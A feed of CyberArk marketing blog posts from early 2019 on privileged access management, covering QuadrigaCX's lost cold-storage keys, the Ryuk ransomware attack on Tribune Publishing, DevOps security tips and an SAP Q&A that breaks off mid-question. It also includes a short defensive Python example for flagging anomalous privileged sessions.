Premiering Feb. 19: CyberArk Webinar on Top Security Projects Featuring Gartner’s Neil MacDonald https://www.cyberark.com/blog/premiering-feb-19-cyberark-webinar-on-top-security-projects-featuring-gartners-neil-macdonald/ Wed, 06 Feb 2019 14:30:11 +0000 https://www.cyberark.com/?p=36311

When it comes to picking the right security projects, Neil MacDonald, Gartner vice president and distinguished analyst, knows exactly where to start: “Focus on projects that reduce the most amount of risk and have the largest business impact,” he said.[1]

Gartner’s information security team did just that when they assembled their top ten recommendations for security projects. The team went through dozens of submissions for top security projects and stack-ranked them as a team before selecting privileged access management as their top project.

On Tuesday, February 19, CyberArk will present the webinar “Top Security Projects for Security and Risk Management Organizations.” It features Gartner’s Neil MacDonald and Steven Preston, CyberArk’s vice president of corporate marketing. The webinar will examine Gartner’s top five security recommendations and how they made their choices.

The Gartner information security team began with a set of criteria for how to select their top projects. They had to be real projects – not programs. Every implementation on the list needed to have a start and end date. They also needed to be real technology. While the Gartner team wanted to advance newer technology, they also insisted that everything on the list be able to be budgeted and staffed within a year.

The number one priority for the top security projects was that they reduce risk. However, reducing risk wasn’t necessarily enough. CISOs often have a large number of projects competing for their budget, or difficulty getting the staffing they need, so the projects needed to not just reduce risk, but reduce the most risk for the amount of resources they required.

Business impact made up the other half of the evaluation criteria. These projects also had to be the best in terms of their ability to help CISOs meet their business objectives – whether those were enabling DevSecOps-style development or keeping attackers out.

In the end, the security and risk team chose Privileged Access Management for the top spot because it was able to significantly reduce risk by making it harder for attackers to compromise privileged credentials.

Register here for the webinar premiere on Feb. 19.

Watch the webinar to find out how Gartner’s top five security recommendations can help you improve your business. Take a deep dive into the privileged access management space with the 2018 Gartner Magic Quadrant for Privileged Access Management report.[2]

[1] Smarter with Gartner, “Top 10 Security Projects for 2018,” Jill Beadle, 6 June 2018.

[2] Gartner, “Magic Quadrant for Privileged Access Management,” Felix Gaehtgens, Dale Gardner, Justin Taylor, Abhyuday Data, Michael Kelley, 3 December 2018.

Lost Access to Cryptocurrency Cold Storage Puts $200 Million on Ice https://www.cyberark.com/blog/lost-access-to-cryptocurrency-cold-storage-puts-200-million-on-ice/ Tue, 05 Feb 2019 18:59:32 +0000 https://www.cyberark.com/?p=36320

After the death of its founder, Canadian crypto exchange QuadrigaCX has not been able to access close to $200 million worth of cryptocurrency. Gerald Cotten, QuadrigaCX’s founder, was the only person who knew, or had any access to, the passwords for the account that held the majority of the firm’s cryptocurrency assets. He opted to hold these company assets in “cold storage,” a way of storing Bitcoin or other cryptocurrency offline, as opposed to a “hot wallet,” which runs on an internet-connected device and is therefore susceptible to cyberattack. Cryptocurrency cold storage is more common for holding large amounts of cryptocurrency, whereas hot wallets are used for more day-to-day transactions and store smaller amounts of crypto, so there’s nothing out of the ordinary in QuadrigaCX’s use of cold storage. The real problem occurs when the only person who can gain access to the money isn’t around anymore.

However, having only one person able to access these credentials presents its own inherent level of risk. Both Cotten’s widow and technical experts have so far been unable to bypass the encryption that safeguards QuadrigaCX’s money, and QuadrigaCX’s clients are looking to recoup their investments. Reports have the firm trying to employ sophisticated decryption methods, digging through old notebooks, spreadsheets and everything in between to get into Cotten’s cryptocurrency cold storage.

It’s, frankly, a testament to Cotten that no one has been able to access his company’s most important assets even after his death. However, his decision to keep his privileges to himself has left his company – and his wife – in dire straits. Nobody associated with the firm has been able to recover a password, as it appears they were not written down, stored in a spreadsheet or passed along to anyone else. Of course, to avoid security breaches involving privilege, privileged credentials should never be left out in the open, on Post-it notes, in discarded notebooks or in spreadsheets (gasp). But, as we’ve seen with QuadrigaCX, keeping everything to yourself has its own dangers. Management is key.

Unfortunately, we’ve seen attackers use all of the above to get into organizations’ networks, so it’s worth repeating that privileged credentials should be guarded and kept secret from anyone who doesn’t require that level of access in order to do their job. But when only one person knows the credentials, there is no method for disaster recovery or shared access in the event that the “knower of passwords” isn’t able to provide them. The risks associated with keeping credentials and assets offline, especially when only one person is able to access them, are severe and demonstrate the importance of having a centralized, encrypted repository that can safeguard privileged credentials, passwords, keys, secrets and more.

Super Bowl Ads Tackle AI and Cybersecurity https://www.cyberark.com/blog/super-bowl-ads-tackle-ai-and-cyber-security/ Mon, 04 Feb 2019 17:33:35 +0000 https://www.cyberark.com/?p=36198

Super Bowl LIII just concluded and the Patriots are now tied for the most Super Bowl victories in NFL history alongside the Pittsburgh Steelers. Tom Brady is now the oldest quarterback to ever win the Super Bowl, and no quarterback has even played in more Super Bowls than Brady has won! But enough carrying on about the Patriots’ epic win; let’s discuss what the main event is for many Super Bowl viewers: the advertisements!

From my point of view, the best ads from Super Bowl LIII were the “not brewed with corn syrup” ads from Budweiser Light. The ads kept the popular “Dilly! Dilly!” concept going while cleverly weaving in Bud Light’s new “not brewed with corn syrup” theme. And the Bud Light take-over ad by HBO’s Game of Thrones was completely unexpected and quite clever.

However, even when watching the Super Bowl, I don’t stop thinking about cybersecurity. So, I noticed just how many of this year’s Super Bowl ads related to the power and potential downside of artificial intelligence. The most positive depiction of AI came with the ad for the Mercedes A-Class. The protagonist in the ad uses AI-backed voice recognition software to make his wishes come true, including swapping out the singer at an opera for Ludacris and freeing a whale, Free Willy-style. Although the Mercedes A-Class cannot go that far in real life, its voice recognition and AI can free up the driver’s hands by making cabin temperature adjustments, changing the media that’s playing or altering the cabin lighting.

In contrast, other ads hinted at some of the potential risks that AI could bring. A good example here is the SimpliSafe home security ad, where an anxious middle-aged man worries that robots are going to take his job and that his smart speakers are “always listening.” But the ad that best exposes the risks of AI is the ad from Alexa showing some of the Alexa functionality that didn’t make the cut, including a dog collar that let Harrison Ford’s pug order insane quantities of dog food and sausage while Harrison Ford looks on helplessly.

Although done in a humorous, tongue-in-cheek fashion, the ad does point to the very real downside of poorly designed and poorly secured always-connected, AI-powered technology. Although an Alexa dog collar that allows Fido to order a ton of dog food might seem funny, a manufacturing organization that has its industrial robots hacked could face very serious consequences.

A recent article in the Wall St. Journal titled “For Industrial Robots, Hacking Risks are on the Rise” points out that the risk of cyberattacks against industrial robots is increasing as more of these robots are connected to the Internet and as the adoption of 5G encourages more connected automation. An attacker could potentially leverage unsecured privileged access to take control of a manufacturing robot and alter its movements so that it creates defective products. Or attackers could plant malware in the robots, forcing companies to pay a ransom before they can return to normal operations.

Risks are not strictly limited to the domain of manufacturing robots. Software bots are becoming increasingly popular as enterprises adopt Robotic Process Automation (RPA). RPA automates and standardizes repeatable business processes with the use of software robots. These software robots interact with applications in the same way that a person does. While RPA delivers tremendous business benefits to organizations in terms of increased operational efficiency, it can come with some risks if not properly secured. For example, an attacker could compromise a highly privileged robot user account to gain access to sensitive data and move laterally within a network or a malicious insider could train a bot to destroy high-value data or interrupt key business processes.

I doubt that Amazon’s Alexa Super Bowl ad was supposed to send viewers down this line of thinking, but let’s hope that other vendors of AI powered technology will share the “not everything makes the cut” sentiment of this ad so that we don’t end up in the “Click Here to Kill Everybody” future envisioned by Bruce Schneier where smart devices leave us open to cyber-attacks from all directions.

If your organization has questions about how to secure AI enabled systems, click here to learn more about the CyberArk Marketplace, which features CyberArk Privileged Access Management integrations with ICS and RPA.

Three Things to Consider When Picking a Privileged Access Management Solution for your Cybersecurity Strategy https://www.cyberark.com/blog/three-things-to-consider-when-picking-a-privileged-access-security-solution-for-your-cybersecurity-strategy/ Thu, 31 Jan 2019 20:37:03 +0000 https://www.cyberark.com/?p=36100

You know that protecting privileged access is paramount in your cybersecurity strategy. But how do you go about selecting the right solution from the right provider? The “Privileged Access Security for Dummies” eBook is the guide you’ve been looking for. Full of actionable tips, technical insight and lessons learned, the eBook delves into the three critical steps to take as you evolve your cybersecurity strategy. The following is a quick look at these recommendations. For full details on what to expect and what to look for as you evaluate potential privileged access management solutions, download a free copy of the eBook today.

  1. Determine where automated tools and services will help you most. Protecting, managing and monitoring privileged access manually can be a tedious, resource-intensive process. It’s nearly impossible for a large organization to manage and protect the thousands of privileged accounts, credentials and secrets used throughout its on-premises, cloud and DevOps environments without automation.

An industry survey revealed that more than half of enterprises (55 percent) see an excess of 10,000 security alerts per day – with 27 percent seeing more than one million daily. Considering these numbers, it’s easy to see how manual analysis of privileged access management risks and vulnerabilities can be prone to human error. One missed alert can result in millions of dollars spent on incident response and recovery. Implementing privileged access management that can automate manual tasks can help your organization simplify operations, improve efficiencies and free up valuable IT staff to focus on strategic tasks – while bolstering your overall security posture.

  2. Understand both current and future use cases for privileged access management solutions. The vast majority of breaches today involve privileged account compromise, so protecting access is a top priority. But, you can’t protect what you can’t see. Only after a comprehensive inventory and assessment of your privileged accounts, credentials and secrets can you effectively determine what security features your organization will need to stay safe now and into the future.

When evaluating privileged access management solutions, it’s important to think beyond your current requirements. Consider how your company’s technology strategy is evolving. Your cybersecurity strategy will need to evolve along with it. Are you moving more workloads to the cloud? Is there an initiative underway to adopt DevOps practices? Then, assess if the solution you’re considering can scale in complex environments, provide out-of-the-box support for existing security systems, and easily integrate with other vendors and applications you work with now – or may work with in the future.

  3. Create a matrix to help evaluate available platform options and providers. Before you begin your search, it’s helpful to develop a simple scoring matrix that outlines required and desired capabilities. This will enable you to assess your current and future use cases against available features and providers. Though every organization has different needs, common evaluation criteria for a privileged access management solution can include:
  • Password management. Does the solution provide flexible and configurable password rotation for users, applications and DevOps tools?
  • Security and recoverability. Does the solution feature an isolated digital vault, hardened and secured to store credentials and privileged session recordings securely? Does it offer multiple options for high availability and disaster recovery?
  • Audit and monitoring. Does the solution provide strong support for audit and monitoring, as well as the ability to detect anomalous account behavior?
  • Tool integration. Does the solution easily integrate with a broad range of IT and security operations tools?
  • Privileged account discovery. Does the solution have capabilities to systematically locate privileged accounts and credentials?
  • Privileged task automation. Does the solution have the ability to automate routine privileged access tasks?
  • Cloud security. Does the solution have the ability to secure, monitor and control access to the “as-a-service” offerings your company uses or plans to use going forward?
  • DevOps management. Does the solution provide comprehensive management of all sensitive elements in the DevOps process?
  • Flexible and scalable architecture. Is the solution architected to accommodate flexible deployment options as your deployment scales?

Following these important steps during your evaluation process will ultimately help you to select the privileged access management provider that best meets your needs, best integrates with your broader security portfolio and has the best long-term support, so you know it will be there when you need it.

Click here to download “Privileged Access Security for Dummies” and learn more.

Data Privacy Day Celebrates a New Era in Privacy https://www.cyberark.com/blog/data-privacy-day-celebrates-a-new-era-in-privacy/ Mon, 28 Jan 2019 17:50:07 +0000 https://www.cyberark.com/?p=36018

Today is the 10th annual international Data Privacy Day. Data Privacy Day commemorates the signing of the first legally binding international treaty on data protection on January 28, 1981 – Convention 108. The holiday was originally celebrated in Europe – where the original treaty was signed – but, in 2009, the U.S. and Canada joined the celebration. In the United States, Data Privacy Day is sponsored by the National Cyber Security Alliance (NCSA).

This year, the theme of Data Privacy Day is “A New Era in Privacy.” As the technology landscape changes, how do you maintain your privacy while forging ahead as a thought leader? The Data Privacy Day event features lectures and panel discussions from experts in business, academia, research and advocacy. They will cover topics like compliance and thought leadership, privacy and breakthrough technology, privacy in the cloud and the GDPR and California Consumer Privacy Act.

While GDPR has made individuals more privacy-aware, there are many cases where poor security habits persist. A recent CyberArk survey showed that nearly half of office workers have had access to sensitive documents, including HR data. Additionally, the survey showed that nearly one in five (19 percent) office workers report that their IT security team is experimenting with biometric security techniques, including fingerprint and retinal scans and embedded microchips – a further step in addressing emerging privacy concerns in the workplace. With its “A New Era in Privacy” theme, Data Privacy Day addresses innovations in data privacy like these.

LinkedIn is hosting Data Privacy Day this year at its San Francisco headquarters from 1:30 to 5:30 PST. For anyone who can’t make the trip, the event is available on livestream.

Real Substance on Privileged Access in DevOps and Cloud https://www.cyberark.com/blog/real-substance-on-privileged-access-in-devops-and-cloud/ Fri, 25 Jan 2019 14:06:33 +0000 https://www.cyberark.com/?p=35756

If you share a generation with me (which is, uh, old), then you likely will remember those great Wendy’s TV commercials from the mid-’80s. In each of those ads, an elderly actress named Clara was handed a huge round bun surrounding a tiny burger patty. Her reaction included the now-famous phrase: “Where’s the beef?” Walter Mondale used the phrase to help win the Democratic primary that year against Gary Hart. It was a good concept, to say the least.

I often find myself wondering where the beef is in many of the cybersecurity reports that cross my desk each year. This is particularly true for technical and marketing documents that focus on popular concepts such as cloud and virtualization – primarily because this is where we are all looking for assistance. Most of these narratives are long on superlatives, and short on details – not unlike Clara’s big bun and tiny patty.

But I found one prominent exception today – one that appears to be filled with useful, accurate details. The topic involves optimizing privileged access in the context of DevOps and Cloud Computing environments. Sponsored by CyberArk, this beefy report includes contributions from thirteen prominent enterprise security executives. Available for download here, its details are summarized below – hopefully without including too much spoiler material.

The report begins with a clear exposition of the typical modern DevOps pipeline, with a clear explanation of the support tools used during the various phases of build, code, plan, test, release, deploy, operate, monitor, and plan. The overlay diagram of commercial and free tools used during application of the DevOps methodology is especially useful in understanding automation in modern continuous delivery.

The report also includes specific guidance on the most familiar shortcuts that lead to privilege-related security issues in the context of DevOps and Cloud. I’ll let you discover the full list in the report, but I can tell you that it starts with the observation that credentials used in DevOps are prime targets for attackers. This is 100% consistent with my own experience, and such insight is vital to selecting the proper DevOps security controls.

The report concludes with several specific recommendations on immediate actions that can be taken by enterprise security teams to reduce privileged access-related risk in DevOps and Cloud. My favorite recommendation is that companies should transform their security teams into full DevOps partners. This has the benefit of helping software developers make the right decisions in their DevOps tasks.

Now, I know that everyone in our industry is busy, and we all have limited time to go through technical reports. But this one is worth your while: It has substance, it includes specific details, and it includes actionable recommendations that will help you in your day-to-day DevOps and Cloud-related activities. And one thing I can promise: Once you’ve completed the report, you will not be asking: Where’s the beef?

Download the CISO View and start learning best practices for protecting privileged access in cloud environments.

Edward Amoroso is the CEO of TAG Cyber, a global cybersecurity advisory, training and media company. Amoroso is also the former Senior Vice President and Chief Security Officer of AT&T, where he worked for 31 years. Find him on LinkedIn and Twitter.

NIST Guidance for Financial Services: Protecting Privileged Access is a Business Imperative https://www.cyberark.com/blog/nist-guidance-for-financial-services-protecting-privileged-access-is-a-business-imperative/ Thu, 24 Jan 2019 15:27:36 +0000 https://www.cyberark.com/?p=35743

Success in today’s financial services market means constantly innovating to meet evolving customer expectations, such as enhanced personalization, mobile banking and cloud-based digital service options. Yet digital disruption and deeper customer engagement mean financial institutions must rely on a broader ecosystem of vendors, partners and disparate internal teams and systems. This results in a host of new privileged users and applications that have access to the organization’s information systems and proprietary information.

Both external attackers and internal malicious actors seeking to compromise financial systems understand this and have focused their efforts on privileged credentials.

New NIST Guidance on Managing Privileged Access
To help the financial sector harden defenses against cyberattacks and privileged credential misuse while continuing to drive digital transformation initiatives, the National Institute of Standards and Technology (NIST) recently released draft guidance on “Privileged Account Management for the Financial Services Sector.” The publication – available in its entirety here – outlines a robust reference design illustrating how financial institutions can implement a comprehensive privileged access management (PAM) system to effectively secure, manage, control and audit privileged accounts.

A worthwhile and informative read, the piece comprises practical guidance and common use-case scenarios to help financial services organizations overcome PAM security challenges and:
• Identify vulnerabilities and risk factors within their environment
• Limit the opportunity for a successful attack by improving control over privileged accounts
• Improve efficiencies by reducing the complexity associated with managing privileged accounts
• Minimize the damage that results from misuse and mistakes by internal/external actors
• Automate enforcement of existing access policies
• Simplify compliance by producing automated reports and documentation

Safeguard Stronger Customer Engagement with CyberArk
The need to innovate means financial services organizations continue to expand and evolve. However, this agility needs to be anchored by a comprehensive, time-tested and proven PAM solution. Used by 21 of the top 25 financial organizations worldwide and consistently recognized by top analysts as a market leader, the CyberArk Privileged Access Security Solution is the only solution that can detect and prevent privileged attacks across on-premises, cloud and DevOps environments.

Discover how to capture new opportunities without jeopardizing brand reputation or regulatory compliance by downloading our industry brief, running a cost-free network scan to uncover potential sources of risk or engaging the CyberArk Red Team to test your organization’s ability to effectively defend against cyberattacks.

Stop the Presses: Ryuk Holds LA Times for Ransom https://www.cyberark.com/blog/stop-the-presses-ryuk-holds-la-times-for-ransom/ Thu, 17 Jan 2019 14:24:42 +0000 https://www.cyberark.com/?p=35674

A recent malware attack disrupted nationwide distribution of major newspapers affiliated with Tribune Publishing. The attack delayed distribution not only of the LA Times and the San Diego Union Tribune, but also interrupted distribution of The Wall Street Journal and New York Times on the West Coast, since they share a printing press with the LA Times.

The malware was identified as Ryuk, a piece of ransomware named after the god of death in the popular Japanese manga Death Note, and Ryuk tries to live up to its namesake. Unlike most ransomware, Ryuk is used exclusively for targeted attacks. Once it infects an organization’s network, it spreads rapidly from computer to computer, encrypting important files behind unbreakable code.

Anyone who tries to access the encrypted data gets a ransom note from the attacker demanding bitcoin in exchange for freeing the data. If the organization refuses to pay, then Ryuk promises to keep the important files locked up forever. The goal of Ryuk ransomware isn’t to steal information, but to shut the victim down.

CyberArk Labs has been aware of Ryuk since it was identified by our compatriots at Check Point Research as a part of the HERMES family of ransomware. As part of its ongoing malware research, CyberArk Labs has thoroughly tested variations of Ryuk to understand its behavior and support the evolution of CyberArk solutions toward preventing this ransomware from encrypting files.

Tribune Publishing first noticed it had a problem when sports editors at the San Diego Union Tribune attempted to send digital files to the plate making facility. Digital files containing anything that was meant for publication would not transmit to the plate making process. The editors were locked out of the system and unable to go to press as usual. Newspapers pride themselves on their timeliness, but with Ryuk malware in the way, the presses were running late. According to the LA Times, between 80 and 85 percent of San Diego Union-Tribune’s Saturday paper didn’t reach subscribers the weekend after the attack.

Once programmers at Tribune Publishing and the LA Times identified that they were dealing with an attack, they started working to isolate the malware code. But they ran into additional problems with every new file they tried to access. Eventually, the programmers were able to start making progress toward containing Ryuk and bringing the Tribune Publishing servers back online. Unfortunately, the security patches didn’t hold and Ryuk re-infected the network.

It’s extremely important to keep Ryuk from ever gaining a foothold in your network. The best way to do that is to lock down the endpoints, containing the attack early in its lifecycle. This can be done by enforcing least privilege on endpoints and using credential theft protection to actively shield against malware. According to Check Point Research, Ryuk needs admin credentials in order to inject its code and begin file encryption. One of the main functions of privilege management is to restrict access to credentials, making it much more difficult for malware like Ryuk to gain access to the kind of account it needs. Check Point Research added that before Ryuk is deployed, the attackers behind it need to collect extensive credentials from the system they intend to infect. Credential theft protection keeps these credentials out of attackers’ hands.

For more research on the connection between malware and credential theft, check out the CyberArk Threat Research blog from the CyberArk Labs team.

]]>
CISO View Insights from the Global 1000: Five Steps for Integrating Security with DevOps https://www.cyberark.com/blog/ciso-view-insights-from-the-global-1000-five-steps-for-integrating-security-with-devops/ Wed, 16 Jan 2019 14:11:52 +0000 https://www.cyberark.com/?p=35429

The Challenge – Security vs. Velocity

While organizations are increasingly adopting DevOps tools and methodologies and seeing tremendous business benefits, it is not always clear that security remains a priority. The truth is that, while developers want security, when security threatens to slow down getting new applications to customers (whether internal or external), security suffers.

It’s an issue CISOs across the globe face – how do you prioritize security without impacting developer velocity? CyberArk, in conjunction with independent research firm Robinson Insight, has assembled an expert panel of CISOs from the world’s leading organizations to discover their best practices and real-world insights into protecting privileged access. Here are some of their key ideas.

Top Five Tips for Integrating Security into the DevOps Environment

1.) Transform the security team into DevOps partners. Many DevOps practitioners do take security seriously; in fact, in the Sonatype DevSecOps Community Survey 2018, 91% agree that “security is part of everyone’s job.” So, for security, the challenge can be harnessing the developers’ beliefs and energy. For example, security teams can engage more effectively by getting up to speed on DevOps tools and techniques. They can also help developers to do the right thing by offering reusable code modules and self-service approaches that make it easier for developers to adopt good security practices.

2.) Prioritize securing DevOps tools and infrastructure. Some important places to get started are reducing the concentration of privilege in the build automation tools and ensuring that code repositories do not expose secrets.

3.) Establish enterprise requirements for securing secrets and credentials. Instead of struggling to consistently control and monitor secrets dispersed across multiple DevOps tools, a better approach to reducing risk and saving time is to implement a centralized secrets management system. The centralized secrets management platform can then be used to ensure that users, whether human or machine, don’t see the actual credentials.

4.) Adapt processes for application testing. With DevOps teams making multiple releases per day, security needs to implement new, automated approaches so as not to slow the process down. For example, security can develop automated, updated processes, such as a “break the build” approach.

5.) Evaluate the results. In most cases, improving the security of DevOps environments happens through many incremental advances. Teams should highlight each success and then build and expand from them. For example, organizations can use metrics to show how much of the attack surface has been addressed and how effective controls are.

The CISO View – DevOps and Cloud Environments

These insights are a small sample of the information assembled by a diverse body of CISOs. Working with the panel of expert CISOs, CyberArk has created a report that provides security leaders with important insights and education. Contributors to the report include security and IT executives from ING Bank, CIBC, Rockwell Automation, Lockheed Martin, Starbucks, Pearson, Asian Development Bank, American Express, NTT Communications, Carlson Wagonlit Travel, Orange Business Services, American Financial Group (AFG) and GIC Private Limited.

The goal of this report, The CISO View, is for security leaders to be able to leverage these experiences and apply them in their own environments. Security and DevOps can be stronger together – The CISO View experts can show you how to get them there.

Download the Full Report

To learn more…

Download the free report.

Watch a brief video that highlights the top 5 recommendations.

Read the press release.

Attend the webinar on February 26th.

Visit the CISO View page.

]]>
Raise the Stakes with Privileged Threat Analytics https://www.cyberark.com/blog/raise-the-stakes-with-privileged-threat-analytics/ Mon, 07 Jan 2019 13:45:37 +0000 https://www.cyberark.com/?p=31963

Brian Koppelman and David Levien’s 1998 cult classic poker movie “Rounders” begins with Matt Damon’s character Mike McDermott narrating, “If you can’t spot the sucker in your first half hour at the table, then you are the sucker.” It’s a memorable line that sets the tone for the entire film.

A theme reinforced throughout the movie is that contrary to popular belief, poker is more about playing your opponent than playing the cards you hold. Cyber attackers know this quite well and can easily spot the “suckers” – and they routinely target these weak links in cyber-attacks (see lesson 2 below). Security teams are often dealt a tough hand – from preexisting tools that fall short, to budget constraints, staffing deficits and more. Security teams must learn to think one step ahead of their opponents (i.e., malicious attackers, insider threats, etc.), have a sound strategy in place and stick to their game plan in order to successfully beat formidable foes. Following are three lessons security teams can learn from the poker table.

Lesson 1: Threats loom even (especially) when you don’t expect them

In the opening scene of “Rounders,” Mike McDermott becomes enamored with his cards (a full house of nines over aces) and falls into an easy trap set by his opponent, the nefarious Teddy KGB (a ludicrous character portrayed by John Malkovich). Mike inevitably is blindsided and loses all of his money when it’s revealed that Teddy has aces over nines.

It can be easy for organizations to fall into the same trap as Mike McDermott and become complacent in their efforts to secure privileged access. In order to really stay ahead of the game, organizations need a way to detect and respond to anomalous behavior going on inside of their environment: threats lurk around every corner, and attackers are constantly coming up with new ways to break into organizations’ environments with the intent of causing damage. This can be accomplished by having a privileged threat analytics engine in place to complement other tools (like SIEMs and UEBAs), generate risk scores for privileged sessions, and deliver alerts to the security operations center (SOC) if/when suspicious behavior involving privileged access occurs. It’s about as common as a royal flush (roughly 1 in 30,939) that an organization would have dedicated employees sit and watch all video logs of privileged sessions, so having a tool that is also able to prioritize events is an absolute must. Without this privileged threat analytics piece, security teams are left with video recordings that they’ve captured to meet compliance requirements but aren’t leveraging to detect and prevent attacks that are in process.

Lesson 2: Sharks always exploit the weakest link

In one of the (relatively) light-hearted scenes in the movie that also traces back to the opening line, Mike and his collective group of card shark friends are playing a low-stakes game in Atlantic City. Eventually, an unsuspecting tourist has the misfortune of sitting at their table and is quickly stripped of his money. There’s an easy parallel to be made here between how attackers look for the path of least resistance, repeatedly target the weak link in an organization and often go undetected until their target is breached.

The latest Mandiant M-Trends report states that it takes an average of 101 days from the time of breach to discovery.[1] Sophisticated attacks on Kerberos authentication such as Golden Ticket type attacks against Domain Controllers typically take even longer to detect. Attackers go unnoticed for months on end, and by the time they’re finally discovered, there is very little that security teams can do. Oftentimes, these attacks start with a phishing attack in which an attacker gains entry to a network by getting an unsuspecting victim to click on a link. The attacker then gains access to the network and proceeds to move laterally until gaining access to critical infrastructure such as Domain Controllers. With a privileged threat analytics tool in place, security teams can not only identify when a Golden Ticket attack is occurring but also take steps to halt the attack, such as changing the password for the KRBTGT account twice in rapid succession. (For those of you who are curious, the KRBTGT account is a local default account that acts as a service account for the Key Distribution Center (KDC) service. An attacker who gains access to this account can rob an organization blind, similar to what happens to the unsuspecting tourist in the movie.)

Lesson 3: Study the behavior of your surroundings

The finale of the movie pits Mike McDermott against Teddy KGB, playing in an all-or-nothing game of heads-up poker, where if Mike loses, he faces the direst of consequences. While playing, Mike notices that every time Teddy KGB starts eating Oreos from the tray in front of him, he has a great hand. In poker, this is called a “tell.” Mike gets crushed at the onset, but eventually gets pulled into a hand with a good set of cards (similarly to the opening scene) and is in desperate need of a win. However, he folds because he sees Teddy chomping away at his Oreos. He lets Teddy know that he knows his tell, which completely rattles Teddy and changes the course of the game. (**Spoiler**) By taking this path, Mike eventually comes out on top.

For security teams, the lesson is to always pay attention to your surroundings – from humans accessing critical systems to applications communicating with other applications, or some combination of the two. For instance, if a machine that contains sensitive data is being accessed during irregular hours, and/or from an irregular IP, an alert can be sent to the SOC to prompt further investigation of the event. In some cases, administrators may opt to set policies to automatically suspend these sessions until they can be verified. Having tools in place that pay attention to privileged behavior can help organizations to develop a baseline for what’s “typical,” rapidly flag things that seem to be out of the ordinary (an attacker’s tell) and provide the ability to quickly respond to the threat. These tools can mean the difference between a breach and business continuity.
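The baseline-and-deviate idea described above (flag a privileged session at an unusual hour or from an unusual source, and send it to the SOC), as an added example that is not CyberArk code or a description of its product's scoring; the session records are constructed and the scoring rule is a deliberate simplification.

```python
"""Baseline privileged sessions per account, then score new sessions for 'tells'.

Added example: HISTORY and the new sessions in the test are constructed records,
and the 50/50 scoring rule is an illustrative simplification, not a vendor's algorithm.
"""
from collections import defaultdict
from datetime import datetime
import ipaddress

# Constructed history of privileged sessions: (account, target, ISO timestamp, source IP).
HISTORY = [
    ("svc_backup", "fileserver01", "2018-11-05T02:10:00", "10.1.4.20"),
    ("svc_backup", "fileserver01", "2018-11-06T02:12:00", "10.1.4.20"),
    ("svc_backup", "fileserver01", "2018-11-07T02:09:00", "10.1.4.21"),
    ("jsmith", "dc01", "2018-11-05T09:30:00", "10.1.8.55"),
    ("jsmith", "dc01", "2018-11-06T10:05:00", "10.1.8.55"),
    ("jsmith", "dc01", "2018-11-07T14:40:00", "10.1.8.60"),
]


def build_baseline(records, prefix=24):
    """Per account, record the hours of day seen and the source networks seen.

    Source IPs are generalised to a /prefix network so a new host on a known
    admin subnet is not treated as an anomaly.
    """
    hours = defaultdict(set)
    nets = defaultdict(set)
    for account, _target, ts, ip in records:
        hours[account].add(datetime.fromisoformat(ts).hour)
        nets[account].add(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))
    return {"hours": dict(hours), "nets": dict(nets)}


def _near_known_hour(hour, seen_hours, slack):
    # Treat 23:00 and 00:00 as neighbours (wrap around midnight).
    return any(abs(hour - h) <= slack or abs(hour - h) >= 24 - slack for h in seen_hours)


def score_session(baseline, record, hour_slack=1):
    """Return (score, reasons); 0 means the session matches the account's baseline."""
    account, _target, ts, ip = record
    seen_hours = baseline["hours"].get(account)
    if seen_hours is None:
        # No history at all: escalate rather than guess.
        return 100, [f"{account}: no baseline, first privileged session seen"]
    score, reasons = 0, []
    hour = datetime.fromisoformat(ts).hour
    if not _near_known_hour(hour, seen_hours, hour_slack):
        score += 50
        reasons.append(f"{account}: hour {hour:02d} outside usual hours {sorted(seen_hours)}")
    addr = ipaddress.ip_address(ip)
    if not any(addr in net for net in baseline["nets"][account]):
        score += 50
        reasons.append(f"{account}: source {ip} not in any previously seen network")
    return score, reasons


def triage(baseline, sessions, alert_threshold=50):
    """Return the sessions that should go to the SOC queue as (record, score, reasons)."""
    queue = []
    for record in sessions:
        score, reasons = score_session(baseline, record)
        if score >= alert_threshold:
            queue.append((record, score, reasons))
    return queue


if __name__ == "__main__":
    base = build_baseline(HISTORY)
    new = [("svc_backup", "fileserver01", "2018-11-08T15:30:00", "203.0.113.7")]
    for record, score, reasons in triage(base, new):
        print(score, record, reasons)
```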

The CyberArk Privileged Access Security Solution provides organizations with the controls to secure privileged access, detect when suspicious activity is occurring and prevent attacks that are underway as soon as possible. The CyberArk solution works with leading SIEM and UEBA tools such as LogRhythm, Splunk, QRadar and more to enable organizations to collect, detect, alert and respond to high-risk activity and behavior involving privileged access. Protection from advanced threats requires a complete layer of privileged access management; check out these integrations and more at the CyberArk Marketplace, here.

[1] Mandiant M-Trends 2018 report

]]>
Q&A: Securing SAP ERP Systems with CyberArk https://www.cyberark.com/blog/qa-securing-sap-erp-systems-with-cyberark/ Wed, 02 Jan 2019 16:12:01 +0000 https://www.cyberark.com/?p=31932

Privileged accounts exist in every layer of an ERP system implementation, from the underlying infrastructure to the enterprise applications powering the business. In the right hands they help safeguard business-critical assets and data. In the wrong hands they can be used to disrupt operations and steal confidential information.

In a recent, popular On the Front Lines webinar, we explored critical challenges enterprises face in protecting SAP ERP systems, and we also gave a quick demo of the CyberArk SAP Certified Privileged Access Security Solution. We had a large audience and a number of technical questions were raised and addressed during the session. Following are some excerpts. You can also read presentation takeaways or tune in to the full webinar and demo on demand.

Q: What type of configuration in SAP is required to set up SAP with CyberArk?

You don’t have to do anything specific inside SAP to start managing privileged credentials with CyberArk. Since we use the native SAP API to rotate credentials, the CyberArk solution will appear just like any other SAP client from the outside to SAP, and therefore, no special changes or installations are required.

You can utilize CyberArk SAP Scanner to detect privileged accounts across the SAP system. Once you have a good handle on where these accounts exist and how many there are, you can automatically onboard these privileged SAP accounts through a configuration within the CyberArk Enterprise Password Vault leveraging the CyberArk REST API. Within minutes, you can apply policies to effectively manage these credentials in a single location and prevent unauthorized access to critical systems. Additionally, you can begin to rotate and update credentials at regular intervals or on demand (based on policy), including managing the sensitive DDIC credentials used in the SAP upgrade process.

Q: Does CyberArk integrate with SAP HANA Database and SAP Java Portal?

Through CyberArk’s partnership with SAP (certified by NetWeaver), we integrate with SAP HANA – you can view details of this integration on the CyberArk Marketplace, as well as several other SAP integrations including SAP Concur, SAP GUI, SAP Sybase ASE Database – Adaptive Server Enterprise and SAP Sybase ASE ODBC Driver.

For integration needs for Java Portal, please get in touch with your CyberArk representative, so we can learn more about your integration needs. We’re more than happy to work with you on a customized solution, and we continue to add new integrations to the CyberArk Marketplace regularly.

Q: How long can you store session recordings and histories?

